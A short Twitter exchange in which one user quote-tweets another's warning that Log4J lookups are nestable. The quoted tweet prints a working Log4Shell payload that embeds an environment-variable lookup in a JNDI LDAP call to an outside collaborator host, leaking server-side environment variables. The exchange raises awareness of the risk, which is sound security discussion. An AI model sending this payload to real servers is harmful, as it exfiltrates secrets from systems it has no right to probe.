Twitter Feed
@gcouprie ("Geoffroy Couprie") wrote:
Great example here of what can happen if you put secrets in environment variables
with quote tweet:
@_StaticFlow_ ("Tanner Barnes") wrote:
In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like
${jndi:ldap://${env:user}.xyz.collab.com/a}
Will leak server side env vars!